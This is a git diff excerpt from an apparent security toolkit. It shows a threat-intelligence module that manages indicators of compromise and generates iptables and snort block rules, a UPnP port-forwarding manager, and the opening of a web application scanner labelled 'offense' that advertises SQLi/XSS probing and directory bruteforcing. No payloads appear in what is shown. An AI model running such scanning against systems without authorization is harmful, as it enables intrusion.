name: str
feed_type: str # taxii, csv_url, json_url, stix_file
url: str = ""
api_key: str = ""
enabled: bool = True
last_fetch: str = ""
ioc_count: int = 0
interval_hours: int = 24
def to_dict(self) -> Dict:
return {
'name': self.name, 'feed_type': self.feed_type,
'url': self.url, 'api_key': self.api_key,
'enabled': self.enabled, 'last_fetch': self.last_fetch,
'ioc_count': self.ioc_count, 'interval_hours': self.interval_hours,
'id': hashlib.md5(f"{self.name}:{self.url}".encode()).hexdigest()[:12]
}
# ── Threat Intel Engine ──────────────────────────────────────────────────────
class ThreatIntelEngine:
"""IOC management and threat intelligence correlation."""
def __init__(self):
self.data_dir = os.path.join(get_data_dir(), 'threat_intel')
os.makedirs(self.data_dir, exist_ok=True)
self.iocs: List[IOC] = []
self.feeds: List[Feed] = []
self.alerts: List[Dict] = []
self._lock = threading.Lock()
self._load()
def _load(self):
"""Load IOCs and feeds from disk."""
ioc_file = os.path.join(self.data_dir, 'iocs.json')
if os.path.exists(ioc_file):
try:
with open(ioc_file) as f:
data = json.load(f)
self.iocs = [IOC.from_dict(d) for d in data]
except Exception:
pass
feed_file = os.path.join(self.data_dir, 'feeds.json')
if os.path.exists(feed_file):
try:
with open(feed_file) as f:
data = json.load(f)
self.feeds = [Feed(**d) for d in data]
except Exception:
pass
def _save_iocs(self):
"""Persist IOCs to disk."""
ioc_file = os.path.join(self.data_dir, 'iocs.json')
with open(ioc_file, 'w') as f:
json.dump([ioc.to_dict() for ioc in self.iocs], f, indent=2)
def _save_feeds(self):
"""Persist feeds to disk."""
feed_file = os.path.join(self.data_dir, 'feeds.json')
with open(feed_file, 'w') as f:
json.dump([feed.to_dict() for feed in self.feeds], f, indent=2)
# ── IOC Type Detection ───────────────────────────────────────────────
def detect_ioc_type(self, value: str) -> str:
"""Auto-detect IOC type from value."""
value = value.strip()
# Hash detection
if re.match(r'^[a-fA-F0-9]{32}$', value):
return 'hash_md5'
if re.match(r'^[a-fA-F0-9]{40}$', value):
return 'hash_sha1'
if re.match(r'^[a-fA-F0-9]{64}$', value):
return 'hash_sha256'
# URL
if re.match(r'^https?://', value, re.I):
return 'url'
# Email
if re.match(r'^[^@]+@[^@]+\.[^@]+$', value):
return 'email'
# IP (v4)
if re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', value):
return 'ip'
# Domain
if re.match(r'^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*\.[a-zA-Z]{2,}$', value):
return 'domain'
# Filename
if '.' in value and '/' not in value and '\\' not in value:
return 'filename'
return 'unknown'
# ── IOC CRUD ─────────────────────────────────────────────────────────
def add_ioc(self, value: str, ioc_type: str = None, source: str = "manual",
tags: List[str] = None, severity: str = "unknown",
description: str = "", reference: str = "") -> Dict:
"""Add a single IOC."""
if not ioc_type:
ioc_type = self.detect_ioc_type(value)
now = datetime.now(timezone.utc).isoformat()
# Check for duplicate
with self._lock:
for existing in self.iocs:
if existing.value == value and existing.ioc_type == ioc_type:
existing.last_seen = now
if tags:
existing.tags = list(set(existing.tags + tags))
self._save_iocs()
return {'ok': True, 'action': 'updated', 'ioc': existing.to_dict()}
ioc = IOC(
value=value, ioc_type=ioc_type, source=source,
tags=tags or [], severity=severity,
first_seen=now, last_seen=now,
description=description, reference=reference
)
self.iocs.append(ioc)
self._save_iocs()
return {'ok': True, 'action': 'created', 'ioc': ioc.to_dict()}
def remove_ioc(self, ioc_id: str) -> Dict:
"""Remove IOC by ID."""
with self._lock:
before = len(self.iocs)
self.iocs = [
ioc for ioc in self.iocs
if hashlib.md5(f"{ioc.ioc_type}:{ioc.value}".encode()).hexdigest()[:12] != ioc_id
]
if len(self.iocs) < before:
self._save_iocs()
return {'ok': True}
return {'ok': False, 'error': 'IOC not found'}
def get_iocs(self, ioc_type: str = None, source: str = None,
severity: str = None, search: str = None,
active_only: bool = True) -> List[Dict]:
"""Query IOCs with filters."""
results = []
for ioc in self.iocs:
if active_only and not ioc.active:
continue
if ioc_type and ioc.ioc_type != ioc_type:
continue
if source and ioc.source != source:
continue
if severity and ioc.severity != severity:
continue
if search and search.lower() not in ioc.value.lower() and \
search.lower() not in ioc.description.lower() and \
not any(search.lower() in t.lower() for t in ioc.tags):
continue
results.append(ioc.to_dict())
return results
def bulk_import(self, text: str, source: str = "import",
ioc_type: str = None) -> Dict:
"""Import IOCs from newline-separated text."""
imported = 0
skipped = 0
for line in text.strip().splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
# Handle CSV-style (value,type,severity,description)
parts = [p.strip() for p in line.split(',')]
value = parts[0]
t = parts[1] if len(parts) > 1 and parts[1] in IOC_TYPES else ioc_type
sev = parts[2] if len(parts) > 2 else 'unknown'
desc = parts[3] if len(parts) > 3 else ''
if not value:
skipped += 1
continue
result = self.add_ioc(value=value, ioc_type=t, source=source,
severity=sev, description=desc)
if result['ok']:
imported += 1
else:
skipped += 1
return {'ok': True, 'imported': imported, 'skipped': skipped}
def export_iocs(self, fmt: str = 'json', ioc_type: str = None) -> str:
"""Export IOCs in specified format."""
iocs = self.get_iocs(ioc_type=ioc_type, active_only=False)
if fmt == 'csv':
lines = ['value,type,severity,source,tags,description']
for ioc in iocs:
tags = ';'.join(ioc.get('tags', []))
lines.append(f"{ioc['value']},{ioc['ioc_type']},{ioc['severity']},"
f"{ioc['source']},{tags},{ioc.get('description', '')}")
return '\n'.join(lines)
elif fmt == 'stix':
# Basic STIX 2.1 bundle
objects = []
for ioc in iocs:
stix_type = {
'ip': 'ipv4-addr', 'domain': 'domain-name',
'url': 'url', 'email': 'email-addr',
'hash_md5': 'file', 'hash_sha1': 'file', 'hash_sha256': 'file',
'filename': 'file'
}.get(ioc['ioc_type'], 'artifact')
if stix_type == 'file' and ioc['ioc_type'].startswith('hash_'):
hash_algo = ioc['ioc_type'].replace('hash_', '').upper().replace('SHA', 'SHA-')
obj = {
'type': 'indicator',
'id': f"indicator--{ioc['id']}",
'name': ioc['value'],
'pattern': f"[file:hashes.'{hash_algo}' = '{ioc['value']}']",
'pattern_type': 'stix',
'valid_from': ioc.get('first_seen', ''),
'labels': ioc.get('tags', [])
}
else:
obj = {
'type': 'indicator',
'id': f"indicator--{ioc['id']}",
'name': ioc['value'],
'pattern': f"[{stix_type}:value = '{ioc['value']}']",
'pattern_type': 'stix',
'valid_from': ioc.get('first_seen', ''),
'labels': ioc.get('tags', [])
}
objects.append(obj)
bundle = {
'type': 'bundle',
'id': f'bundle--autarch-{int(time.time())}',
'objects': objects
}
return json.dumps(bundle, indent=2)
else: # json
return json.dumps(iocs, indent=2)
def get_stats(self) -> Dict:
"""Get IOC database statistics."""
by_type = {}
by_severity = {}
by_source = {}
for ioc in self.iocs:
by_type[ioc.ioc_type] = by_type.get(ioc.ioc_type, 0) + 1
by_severity[ioc.severity] = by_severity.get(ioc.severity, 0) + 1
by_source[ioc.source] = by_source.get(ioc.source, 0) + 1
return {
'total': len(self.iocs),
'active': sum(1 for i in self.iocs if i.active),
'by_type': by_type,
'by_severity': by_severity,
'by_source': by_source
}
# ── Feed Management ──────────────────────────────────────────────────
def add_feed(self, name: str, feed_type: str, url: str,
api_key: str = "", interval_hours: int = 24) -> Dict:
"""Add a threat intelligence feed."""
feed = Feed(
name=name, feed_type=feed_type, url=url,
api_key=api_key, interval_hours=interval_hours
)
self.feeds.append(feed)
self._save_feeds()
return {'ok': True, 'feed': feed.to_dict()}
def remove_feed(self, feed_id: str) -> Dict:
"""Remove feed by ID."""
before = len(self.feeds)
self.feeds = [
f for f in self.feeds
if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] != feed_id
]
if len(self.feeds) < before:
self._save_feeds()
return {'ok': True}
return {'ok': False, 'error': 'Feed not found'}
def get_feeds(self) -> List[Dict]:
"""List all feeds."""
return [f.to_dict() for f in self.feeds]
def fetch_feed(self, feed_id: str) -> Dict:
"""Fetch IOCs from a feed."""
if not requests:
return {'ok': False, 'error': 'requests library not available'}
feed = None
for f in self.feeds:
if hashlib.md5(f"{f.name}:{f.url}".encode()).hexdigest()[:12] == feed_id:
feed = f
break
if not feed:
return {'ok': False, 'error': 'Feed not found'}
try:
headers = {}
if feed.api_key:
headers['Authorization'] = f'Bearer {feed.api_key}'
headers['X-API-Key'] = feed.api_key
resp = requests.get(feed.url, headers=headers, timeout=30)
resp.raise_for_status()
imported = 0
if feed.feed_type == 'csv_url':
result = self.bulk_import(resp.text, source=feed.name)
imported = result['imported']
elif feed.feed_type == 'json_url':
data = resp.json()
items = data if isinstance(data, list) else data.get('data', data.get('results', []))
for item in items:
if isinstance(item, str):
self.add_ioc(item, source=feed.name)
imported += 1
elif isinstance(item, dict):
val = item.get('value', item.get('indicator', item.get('ioc', '')))
if val:
self.add_ioc(
val,
ioc_type=item.get('type', None),
source=feed.name,
severity=item.get('severity', 'unknown'),
description=item.get('description', ''),
tags=item.get('tags', [])
)
imported += 1
elif feed.feed_type == 'stix_file':
data = resp.json()
objects = data.get('objects', [])
for obj in objects:
if obj.get('type') == 'indicator':
pattern = obj.get('pattern', '')
# Extract value from STIX pattern
m = re.search(r"=\s*'([^']+)'", pattern)
if m:
self.add_ioc(
m.group(1), source=feed.name,
description=obj.get('name', ''),
tags=obj.get('labels', [])
)
imported += 1
feed.last_fetch = datetime.now(timezone.utc).isoformat()
feed.ioc_count = imported
self._save_feeds()
return {'ok': True, 'imported': imported, 'feed': feed.name}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Reputation Lookups ───────────────────────────────────────────────
def lookup_virustotal(self, value: str, api_key: str) -> Dict:
"""Look up IOC on VirusTotal."""
if not requests:
return {'ok': False, 'error': 'requests library not available'}
ioc_type = self.detect_ioc_type(value)
headers = {'x-apikey': api_key}
try:
if ioc_type == 'ip':
url = f'https://www.virustotal.com/api/v3/ip_addresses/{value}'
elif ioc_type == 'domain':
url = f'https://www.virustotal.com/api/v3/domains/{value}'
elif ioc_type in ('hash_md5', 'hash_sha1', 'hash_sha256'):
url = f'https://www.virustotal.com/api/v3/files/{value}'
elif ioc_type == 'url':
url_id = hashlib.sha256(value.encode()).hexdigest()
url = f'https://www.virustotal.com/api/v3/urls/{url_id}'
else:
return {'ok': False, 'error': f'Unsupported type for VT lookup: {ioc_type}'}
resp = requests.get(url, headers=headers, timeout=15)
if resp.status_code == 200:
data = resp.json().get('data', {}).get('attributes', {})
stats = data.get('last_analysis_stats', {})
return {
'ok': True,
'value': value,
'type': ioc_type,
'malicious': stats.get('malicious', 0),
'suspicious': stats.get('suspicious', 0),
'harmless': stats.get('harmless', 0),
'undetected': stats.get('undetected', 0),
'reputation': data.get('reputation', 0),
'source': 'virustotal'
}
elif resp.status_code == 404:
return {'ok': True, 'value': value, 'message': 'Not found in VirusTotal'}
else:
return {'ok': False, 'error': f'VT API error: {resp.status_code}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
def lookup_abuseipdb(self, ip: str, api_key: str) -> Dict:
"""Look up IP on AbuseIPDB."""
if not requests:
return {'ok': False, 'error': 'requests library not available'}
try:
resp = requests.get(
'https://api.abuseipdb.com/api/v2/check',
params={'ipAddress': ip, 'maxAgeInDays': 90},
headers={'Key': api_key, 'Accept': 'application/json'},
timeout=15
)
if resp.status_code == 200:
data = resp.json().get('data', {})
return {
'ok': True,
'ip': ip,
'abuse_score': data.get('abuseConfidenceScore', 0),
'total_reports': data.get('totalReports', 0),
'country': data.get('countryCode', ''),
'isp': data.get('isp', ''),
'domain': data.get('domain', ''),
'is_public': data.get('isPublic', False),
'source': 'abuseipdb'
}
return {'ok': False, 'error': f'AbuseIPDB error: {resp.status_code}'}
except Exception as e:
return {'ok': False, 'error': str(e)}
# ── Correlation ──────────────────────────────────────────────────────
def correlate_network(self, connections: List[Dict]) -> List[Dict]:
"""Check network connections against IOC database."""
ioc_ips = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'ip' and ioc.active}
ioc_domains = {ioc.value for ioc in self.iocs if ioc.ioc_type == 'domain' and ioc.active}
matches = []
for conn in connections:
remote_ip = conn.get('remote_addr', conn.get('ip', ''))
remote_host = conn.get('hostname', '')
if remote_ip in ioc_ips:
ioc = next(i for i in self.iocs if i.value == remote_ip)
matches.append({
'connection': conn,
'ioc': ioc.to_dict(),
'match_type': 'ip',
'severity': ioc.severity
})
if remote_host and remote_host in ioc_domains:
ioc = next(i for i in self.iocs if i.value == remote_host)
matches.append({
'connection': conn,
'ioc': ioc.to_dict(),
'match_type': 'domain',
'severity': ioc.severity
})
if matches:
self.alerts.extend([{
'timestamp': datetime.now(timezone.utc).isoformat(),
'type': 'network_match',
**m
} for m in matches])
return matches
def correlate_file_hashes(self, hashes: List[str]) -> List[Dict]:
"""Check file hashes against IOC database."""
hash_iocs = {
ioc.value.lower(): ioc
for ioc in self.iocs
if ioc.ioc_type.startswith('hash_') and ioc.active
}
matches = []
for h in hashes:
if h.lower() in hash_iocs:
ioc = hash_iocs[h.lower()]
matches.append({
'hash': h,
'ioc': ioc.to_dict(),
'severity': ioc.severity
})
return matches
# ── Blocklist Generation ─────────────────────────────────────────────
def generate_blocklist(self, fmt: str = 'plain', ioc_type: str = 'ip',
min_severity: str = 'low') -> str:
"""Generate blocklist from IOCs."""
severity_order = ['info', 'low', 'medium', 'high', 'critical']
min_idx = severity_order.index(min_severity) if min_severity in severity_order else 0
items = []
for ioc in self.iocs:
if not ioc.active or ioc.ioc_type != ioc_type:
continue
sev_idx = severity_order.index(ioc.severity) if ioc.severity in severity_order else -1
if sev_idx >= min_idx:
items.append(ioc.value)
if fmt == 'iptables':
return '\n'.join(f'iptables -A INPUT -s {ip} -j DROP' for ip in items)
elif fmt == 'nginx_deny':
return '\n'.join(f'deny {ip};' for ip in items)
elif fmt == 'hosts':
return '\n'.join(f'0.0.0.0 {d}' for d in items)
elif fmt == 'dns_blocklist':
return '\n'.join(items)
elif fmt == 'snort':
return '\n'.join(
f'alert ip {ip} any -> $HOME_NET any (msg:"AUTARCH IOC match {ip}"; sid:{i+1000000}; rev:1;)'
for i, ip in enumerate(items)
)
else: # plain
return '\n'.join(items)
def get_alerts(self, limit: int = 100) -> List[Dict]:
"""Get recent correlation alerts."""
return self.alerts[-limit:]
def clear_alerts(self):
"""Clear all alerts."""
self.alerts.clear()
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None
def get_threat_intel() -> ThreatIntelEngine:
global _instance
if _instance is None:
_instance = ThreatIntelEngine()
return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
"""CLI entry point for Threat Intel module."""
engine = get_threat_intel()
while True:
stats = engine.get_stats()
print(f"\n{'='*60}")
print(f" Threat Intelligence ({stats['total']} IOCs, {len(engine.feeds)} feeds)")
print(f"{'='*60}")
print()
print(" 1 — Add IOC")
print(" 2 — Search IOCs")
print(" 3 — Bulk Import")
print(" 4 — Export IOCs")
print(" 5 — Manage Feeds")
print(" 6 — Reputation Lookup")
print(" 7 — Generate Blocklist")
print(" 8 — View Stats")
print(" 9 — View Alerts")
print(" 0 — Back")
print()
choice = input(" > ").strip()
if choice == '0':
break
elif choice == '1':
value = input(" IOC value: ").strip()
if value:
ioc_type = input(f" Type (auto-detected: {engine.detect_ioc_type(value)}): ").strip()
severity = input(" Severity (critical/high/medium/low/info): ").strip() or 'unknown'
desc = input(" Description: ").strip()
result = engine.add_ioc(value, ioc_type=ioc_type or None,
severity=severity, description=desc)
print(f" {result['action']}: {result['ioc']['value']} ({result['ioc']['ioc_type']})")
elif choice == '2':
search = input(" Search term: ").strip()
results = engine.get_iocs(search=search)
print(f" Found {len(results)} IOCs:")
for ioc in results[:20]:
print(f" [{ioc['severity']:<8}] {ioc['ioc_type']:<12} {ioc['value']}")
elif choice == '3':
print(" Paste IOCs (one per line, Ctrl+D/blank line to finish):")
lines = []
while True:
try:
line = input()
if not line:
break
lines.append(line)
except EOFError:
break
if lines:
result = engine.bulk_import('\n'.join(lines))
print(f" Imported: {result['imported']}, Skipped: {result['skipped']}")
elif choice == '4':
fmt = input(" Format (json/csv/stix): ").strip() or 'json'
output = engine.export_iocs(fmt=fmt)
outfile = os.path.join(engine.data_dir, f'export.{fmt}')
with open(outfile, 'w') as f:
f.write(output)
print(f" Exported to {outfile}")
elif choice == '5':
print(f" Feeds ({len(engine.feeds)}):")
for f in engine.get_feeds():
print(f" {f['name']} ({f['feed_type']}) — last: {f['last_fetch'] or 'never'}")
elif choice == '6':
value = input(" Value to look up: ").strip()
api_key = input(" VirusTotal API key: ").strip()
if value and api_key:
result = engine.lookup_virustotal(value, api_key)
if result['ok']:
print(f" Malicious: {result.get('malicious', 'N/A')} | "
f"Suspicious: {result.get('suspicious', 'N/A')}")
else:
print(f" Error: {result.get('error', result.get('message'))}")
elif choice == '7':
fmt = input(" Format (plain/iptables/nginx_deny/hosts/snort): ").strip() or 'plain'
ioc_type = input(" IOC type (ip/domain): ").strip() or 'ip'
output = engine.generate_blocklist(fmt=fmt, ioc_type=ioc_type)
print(f" Generated {len(output.splitlines())} rules")
elif choice == '8':
print(f" Total IOCs: {stats['total']}")
print(f" Active: {stats['active']}")
print(f" By type: {stats['by_type']}")
print(f" By severity: {stats['by_severity']}")
elif choice == '9':
alerts = engine.get_alerts()
print(f" {len(alerts)} alerts:")
for a in alerts[-10:]:
print(f" [{a.get('severity', '?')}] {a.get('match_type')}: "
f"{a.get('ioc', {}).get('value', '?')}")

331
modules/upnp_manager.py Normal file
View File

@@ -0,0 +1,331 @@
"""
AUTARCH UPnP Port Manager Module
Manage UPnP port forwarding and cron refresh jobs
Requires: miniupnpc (upnpc command)
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "UPnP port forwarding manager"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "defense"
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors, clear_screen
from core.config import get_config
from core.upnp import get_upnp_manager
def print_status(message: str, status: str = "info"):
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
def show_menu(upnp):
"""Display the UPnP manager menu."""
cron = upnp.get_cron_status()
cron_str = f"every {cron['interval']}" if cron['installed'] else "not installed"
internal_ip = upnp._get_internal_ip()
print(f"\n{Colors.BOLD}{Colors.BLUE}UPnP Port Manager{Colors.RESET}")
print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
print(f" Internal IP: {Colors.CYAN}{internal_ip}{Colors.RESET}")
print(f" Cron: {Colors.GREEN if cron['installed'] else Colors.YELLOW}{cron_str}{Colors.RESET}")
print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
print(f" {Colors.BLUE}[1]{Colors.RESET} Show Current Mappings")
print(f" {Colors.BLUE}[2]{Colors.RESET} Add Port Mapping")
print(f" {Colors.BLUE}[3]{Colors.RESET} Remove Port Mapping")
print(f" {Colors.BLUE}[4]{Colors.RESET} Refresh All Mappings")
print(f" {Colors.BLUE}[5]{Colors.RESET} Show External IP")
print(f" {Colors.BLUE}[6]{Colors.RESET} Cron Job Settings")
print(f" {Colors.BLUE}[7]{Colors.RESET} Edit Internal IP")
print(f" {Colors.BLUE}[8]{Colors.RESET} Edit Port Mappings Config")
print(f" {Colors.RED}[0]{Colors.RESET} Back")
print()
def show_mappings(upnp):
"""Show current UPnP port mappings."""
print(f"\n{Colors.BOLD}Current UPnP Mappings{Colors.RESET}")
success, output = upnp.list_mappings()
if success:
print(output)
else:
print_status(output, "error")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def add_mapping(upnp):
"""Add a new port mapping."""
print(f"\n{Colors.BOLD}Add Port Mapping{Colors.RESET}")
try:
internal_ip = upnp._get_internal_ip()
ext_port = input(f" External port: ").strip()
if not ext_port:
return
ext_port = int(ext_port)
int_port_str = input(f" Internal port [{ext_port}]: ").strip()
int_port = int(int_port_str) if int_port_str else ext_port
proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
if not proto:
proto = 'TCP'
if proto not in ('TCP', 'UDP'):
print_status("Invalid protocol", "error")
return
desc = input(f" Description [AUTARCH]: ").strip()
if not desc:
desc = 'AUTARCH'
success, output = upnp.add_mapping(internal_ip, int_port, ext_port, proto, desc)
if success:
print_status(f"Mapping added: {ext_port}/{proto} -> {internal_ip}:{int_port}", "success")
# Offer to save to config
save = input(f"\n Save to config? (y/n) [y]: ").strip().lower()
if save != 'n':
mappings = upnp.load_mappings_from_config()
# Check if already exists
exists = any(m['port'] == ext_port and m['protocol'] == proto for m in mappings)
if not exists:
mappings.append({'port': ext_port, 'protocol': proto})
upnp.save_mappings_to_config(mappings)
print_status("Saved to config", "success")
else:
print_status("Already in config", "info")
else:
print_status(f"Failed: {output}", "error")
except ValueError:
print_status("Invalid port number", "error")
except KeyboardInterrupt:
print()
def remove_mapping(upnp):
"""Remove a port mapping."""
print(f"\n{Colors.BOLD}Remove Port Mapping{Colors.RESET}")
try:
ext_port = input(f" External port: ").strip()
if not ext_port:
return
ext_port = int(ext_port)
proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
if not proto:
proto = 'TCP'
success, output = upnp.remove_mapping(ext_port, proto)
if success:
print_status(f"Mapping removed: {ext_port}/{proto}", "success")
# Offer to remove from config
remove = input(f"\n Remove from config? (y/n) [y]: ").strip().lower()
if remove != 'n':
mappings = upnp.load_mappings_from_config()
mappings = [m for m in mappings if not (m['port'] == ext_port and m['protocol'] == proto)]
upnp.save_mappings_to_config(mappings)
print_status("Removed from config", "success")
else:
print_status(f"Failed: {output}", "error")
except ValueError:
print_status("Invalid port number", "error")
except KeyboardInterrupt:
print()
def refresh_all(upnp):
"""Refresh all configured mappings."""
mappings = upnp.load_mappings_from_config()
if not mappings:
print_status("No mappings configured. Use option [8] to edit.", "warning")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
return
print(f"\n{Colors.BOLD}Refreshing {len(mappings)} mapping(s)...{Colors.RESET}")
results = upnp.refresh_all()
for r in results:
if r['success']:
print_status(f"{r['port']}/{r['protocol']}: OK", "success")
else:
print_status(f"{r['port']}/{r['protocol']}: {r['message']}", "error")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def show_external_ip(upnp):
"""Show external IP."""
success, ip = upnp.get_external_ip()
if success:
print(f"\n {Colors.BOLD}External IP:{Colors.RESET} {Colors.GREEN}{ip}{Colors.RESET}")
else:
print_status(f"Failed: {ip}", "error")
input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
def cron_settings(upnp):
"""Manage cron job settings."""
cron = upnp.get_cron_status()
print(f"\n{Colors.BOLD}Cron Job Settings{Colors.RESET}")
print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
if cron['installed']:
print(f" Status: {Colors.GREEN}Installed{Colors.RESET}")
print(f" Interval: every {cron['interval']}")
print(f" Entry: {Colors.DIM}{cron['line']}{Colors.RESET}")
print()
print(f" {Colors.BLUE}[1]{Colors.RESET} Change interval")
print(f" {Colors.RED}[2]{Colors.RESET} Uninstall cron job")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
else:
print(f" Status: {Colors.YELLOW}Not installed{Colors.RESET}")
print()
print(f" {Colors.BLUE}[1]{Colors.RESET} Install cron job")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
try:
choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip()
if choice == '0':
return
if cron['installed']:
if choice == '1':
hours = input(f" Refresh interval (hours) [12]: ").strip()
hours = int(hours) if hours else 12
if hours < 1 or hours > 24:
print_status("Interval must be 1-24 hours", "error")
return
success, msg = upnp.install_cron(hours)
print_status(msg, "success" if success else "error")
elif choice == '2':
success, msg = upnp.uninstall_cron()
print_status(msg, "success" if success else "error")
else:
if choice == '1':
hours = input(f" Refresh interval (hours) [12]: ").strip()
hours = int(hours) if hours else 12
if hours < 1 or hours > 24:
print_status("Interval must be 1-24 hours", "error")
return
success, msg = upnp.install_cron(hours)
print_status(msg, "success" if success else "error")
except (ValueError, KeyboardInterrupt):
print()
def edit_internal_ip(upnp):
"""Edit the internal IP address."""
config = get_config()
current = upnp._get_internal_ip()
print(f"\n Current internal IP: {Colors.CYAN}{current}{Colors.RESET}")
try:
new_ip = input(f" New internal IP [{current}]: ").strip()
if new_ip and new_ip != current:
config.set('upnp', 'internal_ip', new_ip)
config.save()
print_status(f"Internal IP set to {new_ip}", "success")
elif not new_ip:
print_status("Unchanged", "info")
except KeyboardInterrupt:
print()
def edit_mappings_config(upnp):
"""Edit configured port mappings."""
mappings = upnp.load_mappings_from_config()
print(f"\n{Colors.BOLD}Configured Port Mappings{Colors.RESET}")
print(f"{Colors.DIM}{'' * 40}{Colors.RESET}")
if mappings:
for i, m in enumerate(mappings, 1):
print(f" {Colors.BLUE}[{i}]{Colors.RESET} {m['port']}/{m['protocol']}")
else:
print(f" {Colors.DIM}(none configured){Colors.RESET}")
print()
print(f" {Colors.GREEN}[a]{Colors.RESET} Add mapping to config")
if mappings:
print(f" {Colors.RED}[d]{Colors.RESET} Delete mapping from config")
print(f" {Colors.DIM}[0]{Colors.RESET} Back")
print()
try:
choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip().lower()
if choice == '0':
return
elif choice == 'a':
port = input(f" Port: ").strip()
if not port:
return
port = int(port)
proto = input(f" Protocol (TCP/UDP) [TCP]: ").strip().upper()
if not proto:
proto = 'TCP'
if proto not in ('TCP', 'UDP'):
print_status("Invalid protocol", "error")
return
exists = any(m['port'] == port and m['protocol'] == proto for m in mappings)
if exists:
print_status("Already in config", "info")
return
mappings.append({'port': port, 'protocol': proto})
upnp.save_mappings_to_config(mappings)
print_status(f"Added {port}/{proto}", "success")
elif choice == 'd' and mappings:
idx = input(f" Number to delete: ").strip()
idx = int(idx) - 1
if 0 <= idx < len(mappings):
removed = mappings.pop(idx)
upnp.save_mappings_to_config(mappings)
print_status(f"Removed {removed['port']}/{removed['protocol']}", "success")
else:
print_status("Invalid selection", "error")
except (ValueError, KeyboardInterrupt):
print()
def run():
"""Main entry point for the UPnP manager module."""
config = get_config()
upnp = get_upnp_manager(config)
if not upnp.is_available():
print_status("upnpc (miniupnpc) is not installed!", "error")
print(f" {Colors.DIM}Install with: sudo apt install miniupnpc{Colors.RESET}")
input(f"\n{Colors.DIM}Press Enter to go back...{Colors.RESET}")
return
while True:
try:
clear_screen()
show_menu(upnp)
choice = input(f" {Colors.BOLD}>{Colors.RESET} ").strip()
if choice == '0':
break
elif choice == '1':
show_mappings(upnp)
elif choice == '2':
add_mapping(upnp)
elif choice == '3':
remove_mapping(upnp)
elif choice == '4':
refresh_all(upnp)
elif choice == '5':
show_external_ip(upnp)
elif choice == '6':
cron_settings(upnp)
elif choice == '7':
edit_internal_ip(upnp)
elif choice == '8':
edit_mappings_config(upnp)
except KeyboardInterrupt:
break

1377
modules/vuln_scanner.py Normal file

File diff suppressed because it is too large Load Diff

724
modules/webapp_scanner.py Normal file
View File

@@ -0,0 +1,724 @@
"""AUTARCH Web Application Scanner
Directory bruteforce, subdomain enumeration, vulnerability scanning (SQLi, XSS),
header analysis, technology fingerprinting, SSL/TLS audit, and crawler.
"""
DESCRIPTION = "Web application vulnerability scanner"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import ssl
import socket
import hashlib
import threading
import subprocess
from pathlib import Path
from urllib.parse import urlparse, urljoin, quote
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any, Set
from datetime import datetime, timezone
try:
from core.paths import find_tool, get_data_dir
except ImportError:
import shutil
def find_tool(name):
return shutil.which(name)
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
try:
import requests
from requests.exceptions import RequestException
_HAS_REQUESTS = True
except ImportError:
_HAS_REQUESTS = False
# ── Tech Fingerprints ─────────────────────────────────────────────────────────
TECH_SIGNATURES = {
'WordPress': {'headers': [], 'body': ['wp-content', 'wp-includes', 'wp-json'], 'cookies': ['wordpress_']},
'Drupal': {'headers': ['X-Drupal-'], 'body': ['Drupal.settings', 'sites/default'], 'cookies': ['SESS']},
'Joomla': {'headers': [], 'body': ['/media/jui/', 'com_content'], 'cookies': []},
'Laravel': {'headers': [], 'body': ['laravel_session'], 'cookies': ['laravel_session']},
'Django': {'headers': [], 'body': ['csrfmiddlewaretoken', '__admin__'], 'cookies': ['csrftoken', 'sessionid']},
'Express': {'headers': ['X-Powered-By: Express'], 'body': [], 'cookies': ['connect.sid']},
'ASP.NET': {'headers': ['X-AspNet-Version', 'X-Powered-By: ASP.NET'], 'body': ['__VIEWSTATE', '__EVENTVALIDATION'], 'cookies': ['ASP.NET_SessionId']},
'PHP': {'headers': ['X-Powered-By: PHP'], 'body': ['.php'], 'cookies': ['PHPSESSID']},
'Nginx': {'headers': ['Server: nginx'], 'body': [], 'cookies': []},
'Apache': {'headers': ['Server: Apache'], 'body': [], 'cookies': []},
'IIS': {'headers': ['Server: Microsoft-IIS'], 'body': [], 'cookies': []},
'Cloudflare': {'headers': ['Server: cloudflare', 'cf-ray'], 'body': [], 'cookies': ['__cfduid']},
'React': {'headers': [], 'body': ['react-root', '_reactRootContainer', 'data-reactroot'], 'cookies': []},
'Angular': {'headers': [], 'body': ['ng-app', 'ng-controller', 'angular.min.js'], 'cookies': []},
'Vue.js': {'headers': [], 'body': ['vue.min.js', 'v-bind:', 'v-if=', '__vue__'], 'cookies': []},
'jQuery': {'headers': [], 'body': ['jquery.min.js', 'jquery-'], 'cookies': []},
